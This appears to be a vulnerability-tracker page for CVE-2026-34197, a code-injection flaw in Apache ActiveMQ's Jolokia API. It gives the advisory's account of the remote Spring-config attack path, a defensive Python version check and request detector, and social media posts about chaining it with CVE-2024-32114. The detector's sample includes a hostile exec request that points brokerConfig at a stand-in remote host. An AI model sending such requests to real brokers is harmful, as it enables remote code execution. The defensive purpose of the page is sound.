- Description: Improper Input Validation and Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker and Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that causes the VM transport's brokerConfig parameter to load a remote Spring XML application context through ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before BrokerService validates the configuration, arbitrary code executes on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
- Source: security@apache.org
- NVD status: Undergoing Analysis

CVSS 3.1
- Type: Secondary
- Base score: 8.8
- Impact score: 5.9
- Exploitability score: 2.8
- Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- Severity: HIGH
- Source: security@apache.org
- Weakness: CWE-20 (Improper Input Validation)
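Two defender-side checks derived from the description above, as an added example that is not code from Apache or from the NVD record: a version test for the affected ranges the advisory lists, and a detector that flags Jolokia exec requests against the two BrokerService operations the advisory names, escalating when an argument carries a brokerConfig parameter pointing at a remote resource. It assumes the standard Jolokia JSON request shape (type/mbean/operation/arguments); the sample request bodies are constructed for the example.

```python
import json
import re
from urllib.parse import unquote

# BrokerService operations the advisory says the default Jolokia policy exposes.
RISKY_OPS = {"addNetworkConnector", "addConnector"}
# brokerConfig parameter whose value references a remote (http/https/ftp) resource.
REMOTE_CFG = re.compile(r"brokerConfig=[^&]*(?:https?|ftp)://", re.IGNORECASE)


def parse_version(version):
    """'6.2.3' -> (6, 2, 3); qualifiers such as '-SNAPSHOT' are ignored, short versions padded."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts + (0,) * (3 - len(parts))


def is_affected(version):
    """Affected ranges from the advisory: before 5.19.4, and 6.0.0 up to (not including) 6.2.3."""
    v = parse_version(version)
    return v < (5, 19, 4) or (6, 0, 0) <= v < (6, 2, 3)


def flag_jolokia_request(body):
    """Return findings for one Jolokia JSON request body (single object or bulk list).

    Each finding is (kind, operation, arguments). kind is 'remote-config' when an
    argument holds a brokerConfig parameter referencing a remote resource, else
    'connector-exec' for any other invocation of the two risky operations.
    """
    reqs = json.loads(body)
    reqs = [reqs] if isinstance(reqs, dict) else reqs
    findings = []
    for r in reqs:
        if r.get("type") != "exec" or not str(r.get("mbean", "")).startswith("org.apache.activemq:"):
            continue
        op = str(r.get("operation", "")).split("(")[0]  # drop a '(java.lang.String)' signature suffix
        if op not in RISKY_OPS:
            continue
        args = unquote(" ".join(str(a) for a in r.get("arguments", [])))  # handle URL-encoded args
        kind = "remote-config" if REMOTE_CFG.search(args) else "connector-exec"
        findings.append((kind, op, args))
    return findings


# Constructed sample bodies (not captured traffic).
BENIGN = json.dumps({"type": "read", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
                     "attribute": "TotalMessageCount"})
SUSPECT = json.dumps([{"type": "exec", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
                       "operation": "addNetworkConnector(java.lang.String)",
                       "arguments": ["vm://localhost?brokerConfig=http://203.0.113.5/ctx.xml"]}])

if __name__ == "__main__":
    for v in ("5.18.3", "5.19.4", "6.1.1", "6.2.3"):
        print(v, "affected" if is_affected(v) else "fixed")
    print(flag_jolokia_request(BENIGN))   # []
    print(flag_jolokia_request(SUSPECT))  # [('remote-config', 'addNetworkConnector', ...)]
```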
- Hype score: 10 (a measure of social media activity compared against trending CVEs from the past 12 months; max score 100)
A 13-year-old flaw in Apache ActiveMQ can lead to RCE. CVE-2026-34197 lets attackers run OS commands via the Jolokia API. Chained with CVE-2024-32114, it becomes unauthenticated RCE on some versions. Patched in 5.19.4 and 6.2.3. Learn more: https://t.co/f6HCobOTBr http
@TheHackersNews
10 Apr 2026
5594 Impressions
16 Retweets
32 Likes
4 Bookmarks
2 Replies
2 Quotes
Apache ActiveMQ CVE-2026-34197 allows RCE via Jolokia API by forcing brokers to load attacker-controlled remote Spring configs, becoming unauthenticated RCE on versions 6.0.0-6.1.1 due to CVE-2024-32114. https://t.co/HGn5MYE7bF
@VivekIntel
8 Apr 2026
89 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
**Vulnerability Alert:** Apache ActiveMQ Classic - Jolokia JMX RCE chain (CVE-2026-34197) and related auth bypass (CVE-2024-32114). **Timeline:** Disclosure: 2024-05-02; 2026-04-07, Patch: 2024-05-02; 2026-04-07. **CVE-2026-34197** | CVSS: 8.8 (HIGH) |
@syedaquib77
8 Apr 2026
58 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
**Vulnerability Alert:** Apache ActiveMQ - Consolidated RCE and Jolokia/OpenWire/Fileserver issues (CVE-2026-34197 + CVE-2024-32114 + CVE-2022-41678 + CVE-2023-46604 + CVE-2016-3088). **Timeline:** Disclosure: 2026-04-07, Patch: unknown. **CVE-2026-34197** |
@syedaquib77
7 Apr 2026
64 Impressions
0 Retweets
1 Like
0 Bookmarks
0 Replies
0 Quotes